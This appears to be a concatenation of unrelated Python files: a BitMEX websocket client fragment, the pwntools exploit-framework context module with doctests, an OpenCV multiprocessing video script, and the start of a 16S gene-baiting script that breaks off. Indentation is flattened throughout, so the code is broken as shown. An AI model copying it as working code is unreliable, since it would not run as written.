item.update(updateData)
# Remove canceled / filled orders
if table == 'order' and item['leavesQty'] <= 0:
self.data[table].remove(item)
elif action == 'delete':
self.logger.debug('%s: deleting %s' % (table, message['data']))
# Locate the item in the collection and remove it.
for deleteData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], deleteData)
self.data[table].remove(item)
else:
raise Exception("Unknown action: %s" % action)
except:
self.logger.error(traceback.format_exc())
def __on_open(self):
self.logger.debug("Websocket Opened.")
def __on_close(self):
self.logger.info('Websocket Closed')
self.exit()
def __on_error(self, error):
if not self.exited:
self.error(error)
def __reset(self):
self.data = {}
self.keys = {}
self.exited = False
self._error = None
def findItemByKeys(keys, table, matchData):
for item in table:
matched = True
for key in keys:
if item[key] != matchData[key]:
matched = False
if matched:
return item
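# --- Illustrative usage sketch (not part of the original module) ------------
# Shows the data methods once connect() has returned; 'XBTUSD' and the
# 'mm_bitmex_' clOrdID prefix are placeholder values, and shouldAuth=True
# assumes valid API keys in settings. The __main__ block below shows the
# unauthenticated variant.
def _example_dump_state(symbol="XBTUSD"):
    ws = BitMEXWebsocket()
    ws.connect("https://testnet.bitmex.com/api/v1", symbol=symbol, shouldAuth=True)
    print("Ticker: %s" % ws.get_ticker(symbol))
    print("Position: %s" % ws.position(symbol))
    print("Margin: %s" % ws.funds())
    print("Open orders: %s" % ws.open_orders("mm_bitmex_"))
    ws.exit()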
if __name__ == "__main__":
# create console handler and set level to debug
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
# create formatter
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
# add formatter to ch
ch.setFormatter(formatter)
logger.addHandler(ch)
ws = BitMEXWebsocket()
ws.logger = logger
ws.connect("https://testnet.bitmex.com/api/v1")
while(ws.ws.sock.connected):
sleep(1)
|
__init__.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Implements context management so that nested/scoped contexts and threaded
contexts work properly and as expected.
"""
import collections
import functools
import logging
import os
import platform
import socket
import string
import subprocess
import sys
import threading
import time
import socks
from ..device import Device
from ..timeout import Timeout
_original_socket = socket.socket
class _devnull(object):
name = None
def write(self, *a, **kw): pass
def read(self, *a, **kw): return ''
def flush(self, *a, **kw): pass
def close(self, *a, **kw): pass
class _defaultdict(dict):
"""
Dictionary which loads missing keys from another dictionary.
    This is necessary because the ``default_factory`` method of
:class:`collections.defaultdict` does not provide the key.
Examples:
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['foo']
'bar'
>>> 'foo' in b
False
>>> b['foo'] = 'baz'
>>> b['foo']
'baz'
>>> del b['foo']
>>> b['foo']
'bar'
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['baz'] #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: 'baz'
"""
def __init__(self, default=None):
super(_defaultdict, self).__init__()
if default is None:
default = {}
self.default = default
def __missing__(self, key):
return self.default[key]
class _DictStack(object):
"""
Manages a dictionary-like object, permitting saving and restoring from
a stack of states via :func:`push` and :func:`pop`.
The underlying object used as ``default`` must implement ``copy``, ``clear``,
and ``update``.
Examples:
>>> t = pwnlib.context._DictStack(default={})
>>> t['key'] = 'value'
>>> t
{'key': 'value'}
>>> t.push()
>>> t
{'key': 'value'}
>>> t['key'] = 'value2'
>>> t
{'key': 'value2'}
>>> t.pop()
>>> t
{'key': 'value'}
"""
def __init__(self, default):
self._current = _defaultdict(default)
self.__stack = []
def push(self):
self.__stack.append(self._current.copy())
def pop(self):
self._current.clear()
self._current.update(self.__stack.pop())
def copy(self):
return self._current.copy()
# Pass-through container emulation routines
def __len__(self): return self._current.__len__()
def __delitem__(self, k): return self._current.__delitem__(k)
def __getitem__(self, k): return self._current.__getitem__(k)
def __setitem__(self, k, v): return self._current.__setitem__(k, v)
def __contains__(self, k): return self._current.__contains__(k)
def __iter__(self): return self._current.__iter__()
def __repr__(self): return self._current.__repr__()
def __eq__(self, other): return self._current.__eq__(other)
# Required for keyword expansion operator ** to work
def keys(self): return self._current.keys()
def values(self): return self._current.values()
def items(self): return self._current.items()
class _Tls_DictStack(threading.local, _DictStack):
"""
Per-thread implementation of :class:`_DictStack`.
Examples:
>>> t = pwnlib.context._Tls_DictStack({})
>>> t['key'] = 'value'
>>> print t
{'key': 'value'}
>>> def p(): print t
>>> thread = threading.Thread(target=p)
>>> _ = (thread.start(), thread.join())
{}
"""
pass
def _validator(validator):
"""
    Validator that is tightly coupled to the implementation
of the classes here.
This expects that the object has a ._tls property which
is of type _DictStack.
"""
name = validator.__name__
doc = validator.__doc__
def fget(self):
return self._tls[name]
def fset(self, val):
self._tls[name] = validator(self, val)
def fdel(self):
self._tls._current.pop(name,None)
return property(fget, fset, fdel, doc)
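# --- Illustrative sketch (not part of pwnlib): how @_validator wires a
# thread-local, stack-backed property. '_ExampleConfig' and 'widget' are
# made-up names; the real properties are defined on ContextType below.
class _ExampleConfig(object):
    defaults = {'widget': 0}
    def __init__(self):
        self._tls = _Tls_DictStack(_defaultdict(_ExampleConfig.defaults))
    @_validator
    def widget(self, value):
        # Whatever the validator returns is what gets stored in self._tls
        return int(value)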
class Thread(threading.Thread):
"""
    Instantiates a context-aware thread, which inherits its context when it is
instantiated. The class can be accessed both on the context module as
`pwnlib.context.Thread` and on the context singleton object inside the
context module as `pwnlib.context.context.Thread`.
    Threads created by using the native :class:`threading.Thread` will have a
clean (default) context.
Regardless of the mechanism used to create any thread, the context
is de-coupled from the parent thread, so changes do not cascade
to child or parent.
Saves a copy of the context when instantiated (at ``__init__``)
and updates the new thread's context before passing control
to the user code via ``run`` or ``target=``.
Examples:
>>> context.clear()
>>> context.update(arch='arm')
>>> def p():
... print context.arch
... context.arch = 'mips'
... print context.arch
>>> # Note that a normal Thread starts with a clean context
>>> # (i386 is the default architecture)
>>> t = threading.Thread(target=p)
>>> _=(t.start(), t.join())
i386
mips
>>> # Note that the main Thread's context is unchanged
>>> print context.arch
arm
>>> # Note that a context-aware Thread receives a copy of the context
>>> t = pwnlib.context.Thread(target=p)
>>> _=(t.start(), t.join())
arm
mips
>>> # Again, the main thread is unchanged
>>> print context.arch
arm
Implementation Details:
        This class is implemented by hooking the private function
        :func:`threading.Thread._Thread__bootstrap`, which is called before
passing control to :func:`threading.Thread.run`.
This could be done by overriding ``run`` itself, but we would have to
ensure that all uses of the class would only ever use the keyword
``target=`` for ``__init__``, or that all subclasses invoke
``super(Subclass.self).set_up_context()`` or similar.
"""
def __init__(self, *args, **kwargs):
super(Thread, self).__init__(*args, **kwargs)
self.old = context.copy()
def __bootstrap(self):
"""
Implementation Details:
This only works because the class is named ``Thread``.
If its name is changed, we have to implement this hook
differently.
"""
context.update(**self.old)
super(Thread, self).__bootstrap()
def _longest(d):
"""
Returns an OrderedDict with the contents of the input dictionary ``d``
sorted by the length of the keys, in descending order.
This is useful for performing substring matching via ``str.startswith``,
as it ensures the most complete match will be found.
>>> data = {'a': 1, 'bb': 2, 'ccc': 3}
>>> _longest(data) == data
True
>>> for i in _longest(data): print i
ccc
bb
a
"""
return collections.OrderedDict((k,d[k]) for k in sorted(d, key=len, reverse=True))
class TlsProperty(object):
def __get__(self, obj, objtype=None):
return obj._tls
class ContextType(object):
r"""
Class for specifying information about the target machine.
Intended for use as a pseudo-singleton through the global
variable ``pwnlib.context.context``, available via
``from pwn import *`` as ``context``.
The context is usually specified at the top of the Python file for clarity. ::
#!/usr/bin/env python
context.update(arch='i386', os='linux')
Currently supported properties and their defaults are listed below.
The defaults are inherited from :data:`pwnlib.context.ContextType.defaults`.
Additionally, the context is thread-aware when using
:class:`pwnlib.context.Thread` instead of :class:`threading.Thread`
(all internal ``pwntools`` threads use the former).
The context is also scope-aware by using the ``with`` keyword.
Examples:
>>> context.clear()
>>> context.update(os='linux') # doctest: +ELLIPSIS
>>> context.os == 'linux'
True
>>> context.arch = 'arm'
>>> vars(context) == {'arch': 'arm', 'bits': 32, 'endian': 'little', 'os': 'linux'}
True
>>> context.endian
'little'
>>> context.bits
32
>>> def nop():
... print pwnlib.asm.asm('nop').encode('hex')
>>> nop()
00f020e3
>>> with context.local(arch = 'i386'):
... nop()
90
>>> from pwnlib.context import Thread as PwnThread
>>> from threading import Thread as NormalThread
>>> with context.local(arch = 'mips'):
... pwnthread = PwnThread(target=nop)
... thread = NormalThread(target=nop)
>>> # Normal thread uses the default value for arch, 'i386'
>>> _=(thread.start(), thread.join())
90
>>> # Pwnthread uses the correct context from creation-time
>>> _=(pwnthread.start(), pwnthread.join())
00000000
>>> nop()
00f020e3
"""
#
# Use of 'slots' is a heavy-handed way to prevent accidents
# like 'context.architecture=' instead of 'context.arch='.
#
# Setting any properties on a ContextType object will throw an
# exception.
#
__slots__ = '_tls',
#: Default values for :class:`pwnlib.context.ContextType`
defaults = {
'adb_host': 'localhost',
'adb_port': 5037,
'arch': 'i386',
'aslr': True,
'binary': None,
'bits': 32,
'device': os.getenv('ANDROID_SERIAL', None) or None,
'endian': 'little',
'kernel': None,
'log_level': logging.INFO,
'log_file': _devnull(),
'log_console': sys.stdout,
'randomize': False,
'newline': '\n',
'noptrace': False,
'os': 'linux',
'proxy': None,
'signed': False,
'terminal': None,
'timeout': Timeout.maximum,
}
#: Valid values for :meth:`pwnlib.context.ContextType.os`
oses = sorted(('linux','freebsd','windows','cgc','android'))
big_32 = {'endian': 'big', 'bits': 32}
big_64 = {'endian': 'big', 'bits': 64}
little_8 = {'endian': 'little', 'bits': 8}
little_16 = {'endian': 'little', 'bits': 16}
little_32 = {'endian': 'little', 'bits': 32}
little_64 = {'endian': 'little', 'bits': 64}
#: Keys are valid values for :meth:`pwnlib.context.ContextType.arch`.
#
#: Values are defaults which are set when
#: :attr:`pwnlib.context.ContextType.arch` is set
architectures = _longest({
'aarch64': little_64,
'alpha': little_64,
'avr': little_8,
'amd64': little_64,
'arm': little_32,
'cris': little_32,
'i386': little_32,
'ia64': big_64,
'm68k': big_32,
'mips': little_32,
'mips64': little_64,
'msp430': little_16,
'powerpc': big_32,
'powerpc64': big_64,
's390': big_32,
'sparc': big_32,
'sparc64': big_64,
'thumb': little_32,
'vax': little_32,
})
#: Valid values for :attr:`endian`
endiannesses = _longest({
'be': 'big',
'eb': 'big',
'big': 'big',
'le': 'little',
'el': 'little',
'little': 'little'
})
#: Valid string values for :attr:`signed`
signednesses = {
'unsigned': False,
'no': False,
'yes': True,
'signed': True
}
valid_signed = sorted(signednesses)
def __init__(self, **kwargs):
"""
Initialize the ContextType structure.
All keyword arguments are passed to :func:`update`.
"""
self._tls = _Tls_DictStack(_defaultdict(ContextType.defaults))
self.update(**kwargs)
def copy(self):
"""copy() -> dict
Returns a copy of the current context as a dictionary.
Examples:
>>> context.clear()
>>> context.os = 'linux'
>>> vars(context) == {'os': 'linux'}
True
"""
return self._tls.copy()
@property
def __dict__(self):
return self.copy()
def update(self, *args, **kwargs):
"""
Convenience function, which is shorthand for setting multiple
variables at once.
It is a simple shorthand such that::
context.update(os = 'linux', arch = 'arm', ...)
is equivalent to::
context.os = 'linux'
context.arch = 'arm'
...
The following syntax is also valid::
context.update({'os': 'linux', 'arch': 'arm'})
Arguments:
kwargs: Variables to be assigned in the environment.
Examples:
>>> context.clear()
>>> context.update(arch = 'i386', os = 'linux')
>>> context.arch, context.os
('i386', 'linux')
"""
for arg in args:
self.update(**arg)
for k,v in kwargs.items():
setattr(self,k,v)
def __repr__(self):
v = sorted("%s = %r" % (k,v) for k,v in self._tls._current.items())
return '%s(%s)' % (self.__class__.__name__, ', '.join(v))
def local(self, function=None, **kwargs):
"""local(**kwargs) -> context manager
Create a context manager for use with the ``with`` statement.
For more information, see the example below or PEP 343.
Arguments:
kwargs: Variables to be assigned in the new environment.
Returns:
ContextType manager for managing the old and new environment.
Examples:
>>> context.clear()
>>> context.timeout = 1
>>> context.timeout == 1
True
>>> print context.timeout
1.0
>>> with context.local(timeout = 2):
... print context.timeout
... context.timeout = 3
... print context.timeout
2.0
3.0
>>> print context.timeout
1.0
"""
class LocalContext(object):
def __enter__(a):
self._tls.push()
self.update(**{k:v for k,v in kwargs.items() if v is not None})
return self
def __exit__(a, *b, **c):
self._tls.pop()
def __call__(self, function, *a, **kw):
@functools.wraps(function)
def inner(*a, **kw):
with self:
return function(*a, **kw)
return inner
return LocalContext()
@property
def silent(self, function=None):
"""Disable all non-error logging within the enclosed scope.
"""
return self.local(function, log_level='error')
@property
def quiet(self, function=None):
"""Disables all non-error logging within the enclosed scope,
*unless* the debugging level is set to 'debug' or lower."""
if not function:
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
return self.local(function, log_level=level)
@functools.wraps(function)
def wrapper(*a, **kw):
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
with self.local(function, log_level=level):
return function(*a, **kw)
return wrapper
@property
def verbose(self):
"""Enable all logging within the enclosed scope.
"""
return self.local(log_level='debug')
def clear(self, *a, **kw):
"""
Clears the contents of the context.
All values are set to their defaults.
Arguments:
a: Arguments passed to ``update``
kw: Arguments passed to ``update``
Examples:
>>> # Default value
>>> context.arch == 'i386'
True
>>> context.arch = 'arm'
>>> context.arch == 'i386'
False
>>> context.clear()
>>> context.arch == 'i386'
True
"""
self._tls._current.clear()
if a or kw:
self.update(*a, **kw)
@property
def native(self):
if context.os in ('android', 'cgc'):
return False
arch = context.arch
with context.local(arch = platform.machine()):
platform_arch = context.arch
if arch in ('i386', 'amd64') and platform_arch in ('i386', 'amd64'):
return True
return arch == platform_arch
@_validator
def arch(self, arch):
"""
Target binary architecture.
Allowed values are listed in :attr:`pwnlib.context.ContextType.architectures`.
Side Effects:
If an architecture is specified which also implies additional
attributes (e.g. 'amd64' implies 64-bit words, 'powerpc' implies
big-endian), these attributes will be set on the context if a
user has not already set a value.
The following properties may be modified.
- :attr:`bits`
- :attr:`endian`
Raises:
AttributeError: An invalid architecture was specified
Examples:
>>> context.clear()
>>> context.arch == 'i386' # Default architecture
True
>>> context.arch = 'mips'
>>> context.arch == 'mips'
True
>>> context.arch = 'doge' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: arch must be one of ['aarch64', ..., 'thumb']
>>> context.arch = 'ppc'
>>> context.arch == 'powerpc' # Aliased architecture
True
>>> context.clear()
>>> context.bits == 32 # Default value
True
>>> context.arch = 'amd64'
>>> context.bits == 64 # New value
True
Note that expressly setting :attr:`bits` means that we use
that value instead of the default
>>> context.clear()
>>> context.bits = 32
>>> context.arch = 'amd64'
>>> context.bits == 32
True
Setting the architecture can override the defaults for
both :attr:`endian` and :attr:`bits`
>>> context.clear()
>>> context.arch = 'powerpc64'
>>> vars(context) == {'arch': 'powerpc64', 'bits': 64, 'endian': 'big'}
True
"""
# Lowercase
arch = arch.lower()
# Attempt to perform convenience and legacy compatibility transformations.
# We have to make sure that x86_64 appears before x86 for this to work correctly.
transform = [('ppc64', 'powerpc64'),
('ppc', 'powerpc'),
('x86_64', 'amd64'),
('x86', 'i386'),
('i686', 'i386'),
('armeabi', 'arm'),
('arm64', 'aarch64')]
for k, v in transform:
if arch.startswith(k):
arch = v
break
try:
defaults = ContextType.architectures[arch]
except KeyError:
            raise AttributeError('arch must be one of %r' % sorted(ContextType.architectures))
for k,v in ContextType.architectures[arch].items():
if k not in self._tls:
self._tls[k] = v
return arch
@_validator
def aslr(self, aslr):
"""
ASLR settings for new processes.
If ``False``, attempt to disable ASLR in all processes which are
created via ``personality`` (``setarch -R``) and ``setrlimit``
(``ulimit -s unlimited``).
The ``setarch`` changes are lost if a ``setuid`` binary is executed.
"""
return bool(aslr)
@_validator
def kernel(self, arch):
"""
Target machine's kernel architecture.
Usually, this is the same as ``arch``, except when
running a 32-bit binary on a 64-bit kernel (e.g. i386-on-amd64).
        Even then, this doesn't matter much -- only when the segment
        registers need to be known.
"""
with context.local(arch=arch):
return context.arch
@_validator
def bits(self, bits):
"""
Target machine word size, in bits (i.e. the size of general purpose registers).
The default value is ``32``, but changes according to :attr:`arch`.
Examples:
>>> context.clear()
>>> context.bits == 32
True
>>> context.bits = 64
>>> context.bits == 64
True
>>> context.bits = -1 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (-1)
"""
bits = int(bits)
if bits <= 0:
raise AttributeError("bits must be > 0 (%r)" % bits)
return bits
@_validator
def binary(self, binary):
"""
        Infer target architecture, bit-width, and endianness from a binary file.
Data type is a :class:`pwnlib.elf.ELF` object.
Examples:
>>> context.clear()
>>> context.arch, context.bits
('i386', 32)
>>> context.binary = '/bin/bash'
>>> context.arch, context.bits
('amd64', 64)
>>> context.binary
ELF('/bin/bash')
"""
# Cyclic imports... sorry Idolf.
from ..elf import ELF
if not isinstance(binary, ELF):
binary = ELF(binary)
self.arch = binary.arch
self.bits = binary.bits
self.endian = binary.endian
return binary
@property
def bytes(self):
"""
Target machine word size, in bytes (i.e. the size of general purpose registers).
This is a convenience wrapper around ``bits / 8``.
Examples:
>>> context.bytes = 1
>>> context.bits == 8
True
>>> context.bytes = 0 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (0)
"""
return self.bits/8
@bytes.setter
def bytes(self, value):
self.bits = value*8
@_validator
def endian(self, endianness):
"""
Endianness of the target machine.
The default value is ``'little'``, but changes according to :attr:`arch`.
Raises:
AttributeError: An invalid endianness was provided
Examples:
>>> context.clear()
>>> context.endian == 'little'
True
>>> context.endian = 'big'
>>> context.endian
'big'
>>> context.endian = 'be'
>>> context.endian == 'big'
True
>>> context.endian = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: endian must be one of ['be', 'big', 'eb', 'el', 'le', 'little']
"""
endian = endianness.lower()
if endian not in ContextType.endiannesses:
raise AttributeError("endian must be one of %r" % sorted(ContextType.endiannesses))
return ContextType.endiannesses[endian]
@_validator
def log_level(self, value):
"""
Sets the verbosity of ``pwntools`` logging mechanism.
More specifically, it controls the filtering of messages that happens
inside the handler for logging to the screen. So if you want to, e.g., log
all messages to a file, then this attribute makes no difference to you.
Valid values are specified by the standard Python ``logging`` module.
Default value is set to ``INFO``.
Examples:
>>> context.log_level = 'error'
>>> context.log_level == logging.ERROR
True
>>> context.log_level = 10
>>> context.log_level = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: log_level must be an integer or one of ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
"""
# If it can be converted into an int, success
try: return int(value)
except ValueError: pass
# If it is defined in the logging module, success
try: return getattr(logging, value.upper())
except AttributeError: pass
# Otherwise, fail
level_names = filter(lambda x: isinstance(x,str), logging._levelNames)
permitted = sorted(level_names)
raise AttributeError('log_level must be an integer or one of %r' % permitted)
@_validator
def log_file(self, value):
r"""
Sets the target file for all logging output.
Works in a similar fashion to :attr:`log_level`.
Examples:
>>> context.log_file = 'foo.txt' #doctest: +ELLIPSIS
>>> log.debug('Hello!') #doctest: +ELLIPSIS
>>> with context.local(log_level='ERROR'): #doctest: +ELLIPSIS
... log.info('Hello again!')
>>> with context.local(log_file='bar.txt'):
... log.debug('Hello from bar!')
>>> log.info('Hello from foo!')
>>> file('foo.txt').readlines()[-3] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello!\n'
>>> file('foo.txt').readlines()[-2] #doctest: +ELLIPSIS
'...:INFO:...:Hello again!\n'
>>> file('foo.txt').readlines()[-1] #doctest: +ELLIPSIS
'...:INFO:...:Hello from foo!\n'
>>> file('bar.txt').readlines()[-1] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello from bar!\n'
"""
if isinstance(value, (str,unicode)):
modes = ('w', 'wb', 'a', 'ab')
# check if mode was specified as "[value],[mode]"
if ',' not in value:
value += ',a'
filename, mode = value.rsplit(',', 1)
value = open(filename, mode)
elif not isinstance(value, (file)):
raise AttributeError('log_file must be a file')
# Is this the same file we already have open?
# If so, don't re-print the banner.
if self.log_file and not isinstance(self.log_file, _devnull):
a = os.fstat(value.fileno()).st_ino
b = os.fstat(self.log_file.fileno()).st_ino
if a == b:
return self.log_file
iso_8601 = '%Y-%m-%dT%H:%M:%S'
lines = [
'=' * 78,
' Started at %s ' % time.strftime(iso_8601),
' sys.argv = [',
]
for arg in sys.argv:
lines.append(' %r,' % arg)
lines.append(' ]')
lines.append('=' * 78)
for line in lines:
value.write('=%-78s=\n' % line)
value.flush()
return value
@_validator
def log_console(self, stream):
"""
Sets the default logging console target.
Examples:
>>> context.log_level = 'warn'
>>> log.warn("Hello")
[!] Hello
>>> context.log_console=open('/dev/null', 'w')
>>> log.warn("Hello")
>>> context.clear()
"""
if isinstance(stream, str):
stream = open(stream, 'wt')
return stream
@property
def mask(self):
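"""
Bit mask spanning the target word size, i.e. ``(1 << bits) - 1``.
Examples:
>>> context.clear()
>>> context.mask == 2**32 - 1
True
"""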
return (1 << self.bits) - 1
@_validator
def os(self, os):
"""
Operating system of the target machine.
The default value is ``linux``.
Allowed values are listed in :attr:`pwnlib.context.ContextType.oses`.
Examples:
>>> context.os = 'linux'
>>> context.os = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: os must be one of ['android', 'cgc', 'freebsd', 'linux', 'windows']
"""
os = os.lower()
if os not in ContextType.oses:
raise AttributeError("os must be one of %r" % ContextType.oses)
return os
@_validator
def randomize(self, r):
"""
Global flag indicating that values should be randomized wherever supported.
"""
return bool(r)
@_validator
def signed(self, signed):
"""
Signedness for packing operations when it is not explicitly set.
Can be set to any non-string truthy value, or the specific string
values ``'signed'`` or ``'unsigned'``, which are converted into
``True`` and ``False`` respectively.
Examples:
>>> context.signed
False
>>> context.signed = 1
>>> context.signed
True
>>> context.signed = 'signed'
>>> context.signed
True
>>> context.signed = 'unsigned'
>>> context.signed
False
>>> context.signed = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: signed must be one of ['no', 'signed', 'unsigned', 'yes'] or a non-string truthy value
"""
try: signed = ContextType.signednesses[signed]
except KeyError: pass
if isinstance(signed, str):
raise AttributeError('signed must be one of %r or a non-string truthy value' % sorted(ContextType.signednesses))
return bool(signed)
@_validator
def timeout(self, value=Timeout.default):
"""
Default amount of time to wait for a blocking operation before it times out,
specified in seconds.
The default value is to have an infinite timeout.
See :class:`pwnlib.timeout.Timeout` for additional information on
valid values.
"""
return Timeout(value).timeout
@_validator
def terminal(self, value):
"""
Default terminal used by :meth:`pwnlib.util.misc.run_in_new_terminal`.
Can be a string or an iterable of strings. In the latter case the first
entry is the terminal and the rest are default arguments.
"""
if isinstance(value, (str, unicode)):
return [value]
return value
@property
def abi(self):
return self._abi
@_validator
def proxy(self, proxy):
"""
Default proxy for all socket connections.
Accepts either a string (hostname or IP address) for a SOCKS5 proxy on
the default port, **or** a ``tuple`` passed to ``socks.set_default_proxy``,
e.g. ``(socks.SOCKS4, 'localhost', 1234)``.
>>> context.proxy = 'localhost' #doctest: +ELLIPSIS
>>> r=remote('google.com', 80)
Traceback (most recent call last):
...
ProxyConnectionError: Error connecting to SOCKS5 proxy localhost:1080: [Errno 111] Connection refused
>>> context.proxy = None
>>> r=remote('google.com', 80, level='error')
"""
if not proxy:
socket.socket = _original_socket
return None
if isinstance(proxy, str):
proxy = (socks.SOCKS5, proxy)
if not isinstance(proxy, collections.Iterable):
raise AttributeError('proxy must be a string hostname, or tuple of arguments for socks.set_default_proxy')
socks.set_default_proxy(*proxy)
socket.socket = socks.socksocket
return proxy
@_validator
def noptrace(self, value):
"""Disable all actions which rely on ptrace.
This is useful for switching between local exploitation with a debugger,
and remote exploitation (without a debugger).
This option can be set with the ``NOPTRACE`` command-line argument.
"""
return bool(value)
@_validator
def adb_host(self, value):
"""Sets the target host which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from the ANDROID_ADB_SERVER_HOST environment
variable, falling back to 'localhost'.
"""
return str(value)
@_validator
def adb_port(self, value):
"""Sets the target port which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from the ANDROID_ADB_SERVER_PORT environment
variable, falling back to 5037.
"""
return int(value)
@_validator
def device(self, device):
"""Sets the device being operated on.
"""
if isinstance(device, Device):
self.arch = device.arch or self.arch
self.bits = device.bits or self.bits
self.endian = device.endian or self.endian
self.os = device.os or self.os
elif isinstance(device, str):
device = Device(device)
else:
raise AttributeError("device must be either a Device object or a serial number as a string")
return device
@property
def adb(self):
"""Returns an argument array for connecting to adb."""
command = ['adb']
if self.adb_host != self.defaults['adb_host']:
command += ['-H', self.adb_host]
if self.adb_port != self.defaults['adb_port']:
command += ['-P', str(self.adb_port)]
if self.device:
command += ['-s', str(self.device)]
return command
#*************************************************************************
# ALIASES
#*************************************************************************
#
# These fields are aliases for fields defined above, either for
# convenience or compatibility.
#
#*************************************************************************
def __call__(self, **kwargs):
"""
Alias for :meth:`pwnlib.context.ContextType.update`
"""
return self.update(**kwargs)
def reset_local(self):
"""
Deprecated. Use :meth:`clear`.
"""
self.clear()
@property
def endianness(self):
"""
Legacy alias for :attr:`endian`.
Examples:
>>> context.endian == context.endianness
True
"""
return self.endian
@endianness.setter
def endianness(self, value):
self.endian = value
@property
def sign(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@sign.setter
def sign(self, value):
self.signed = value
@property
def signedness(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@signedness.setter
def signedness(self, value):
self.signed = value
@property
def word_size(self):
"""
Alias for :attr:`bits`
"""
return self.bits
@word_size.setter
def word_size(self, value):
self.bits = value
Thread = Thread
#: Global ``context`` object, used to store commonly-used pwntools settings.
#: In most cases, the context is used to infer default variable values.
#: For example, :meth:`pwnlib.asm.asm` can take an ``os`` parameter as a
#: keyword argument. If it is not supplied, the ``os`` specified by
#: ``context`` is used instead.
#: Consider it a shorthand to passing ``os=`` and ``arch=`` to every single
#: function call.
context = ContextType()
# Inherit default ADB values
if 'ANDROID_ADB_SERVER_HOST' in os.environ:
context.adb_host = os.environ.get('ANDROID_ADB_SERVER_HOST')
if 'ANDROID_ADB_SERVER_PORT' in os.environ:
context.adb_port = int(os.getenv('ANDROID_ADB_SERVER_PORT'))
def LocalContext(function):
"""
Wraps the specified function on a context.local() block, using kwargs.
Example:
>>> @LocalContext
... def printArch():
... print(context.arch)
>>> printArch()
i386
>>> printArch(arch='arm')
arm
"""
@functools.wraps(function)
def setter(*a, **kw):
# Fast path to skip adding a Context frame
if not kw:
return function(*a)
with context.local(**{k:kw.pop(k) for k,v in kw.items() if isinstance(getattr(ContextType, k, None), property)}):
return function(*a, **kw)
return setter
|
final.py
|
from imutils.video import FPS
import imutils
import cv2
import numpy as np
import heapq
import time
import multiprocessing
from multiprocessing import Pool, Queue
RESIZE = 100
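# Pipeline sketch: the main loop tags each captured frame with time.time()
# and pushes it onto input_q; a pool of worker processes forwards (and could
# transform) the frames to output_q, and displayworker shows whatever the
# main loop re-orders into display_q.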
def worker(input_q, output_q):
while True:
frameinfo = input_q.get()
# frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# time.sleep(.05)
# output = imutils.resize(frameinfo[1], width=RESIZE, height=RESIZE)
# output_q.put([frameinfo[0],output])
output_q.put([frameinfo[0],frameinfo[1]])
def displayworker(display_q,npsave):
while True:
frame = display_q.get()
cv2.imshow('Video', frame)
cv2.waitKey(1)
if __name__ == '__main__':
qu_limit = 50
threadn = cv2.getNumberOfCPUs()
print("Threads : ", threadn)
input_q = Queue(qu_limit)  # a larger queue improves throughput (fps) but adds latency
# input_q= heapq.heapify(input_q)
output_q = Queue()
display_q = Queue()
npsave = np.zeros([2,2])
for i in range(50):
p = multiprocessing.Process(target=worker, args=[input_q, output_q])
p.start()
D = multiprocessing.Process(target=displayworker, args=[display_q, npsave])
D.start()
img = cv2.VideoCapture('sample.mp4')
fps = FPS().start()
frame_count = 0
while frame_count < 1000:
ret, frame = img.read()
# if frame_count % qu_limit == 0:
# input_q.put(frame)
input_q.put([time.time(),frame])
if output_q.empty():
pass # fill up queue
else:
frame_count += 1
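# Drain output_q and re-order the processed frames by their capture
# timestamp, since worker processes may finish out of order.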
dummylist=[]
for i in range(output_q.qsize()):
dummylist.append(output_q.get())
dummylist.sort()
for i in dummylist:
display_q.put(i[1])
# data = output_q.get()[1]
# display_q.put(data)
fps.update()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
fps.stop()
print('[INFO] elapsed time (total): {:.2f}'.format(fps.elapsed()))
print('[INFO] approx. FPS: {:.2f}'.format(fps.fps()))
cv2.destroyAllWindows()
|
sixteens_full.py
|
#!/usr/bin/env python3
from olctools.accessoryFunctions.accessoryFunctions import MetadataObject, GenObject, make_path, write_to_logfile, \
run_subprocess
from genemethods.sipprCommon.objectprep import Objectprep
from genemethods.sipprCommon.sippingmethods import Sippr
from Bio.Blast.Applications import NcbiblastnCommandline
from Bio.SeqRecord import SeqRecord
from Bio.Seq import Seq
import Bio.Application
from Bio import SeqIO
from argparse import ArgumentParser
from click import progressbar
from subprocess import Popen
from threading import Thread
from subprocess import PIPE
from csv import DictReader
from queue import Queue
import multiprocessing
from glob import glob
import operator
import logging
import time
import os
__author__ = 'adamkoziol'
class SixteenSBait(Sippr):
def main(self):
"""
Run the required methods in the appropriate order
"""
self.targets()
self.bait(k=49)
self.reversebait(maskmiddle='t', k=19)
self.subsample_reads()
def targets(self):
"""
Create the GenObject for the analysis type, create the hash file for baiting (if necessary)
"""
for sample in self.runmetadata:
setattr(sample, self.analysistype, GenObject())
if sample.general.bestassemblyfile != 'NA':
sample[self.analysistype].runanalysis = True
sample[self.analysistype].targetpath = self.targetpath
baitpath = os.path.join(self.targetpath, 'bait')
sample[self.analysistype].baitfile = glob(os.path.join(baitpath, '*.fa'))[0]
try:
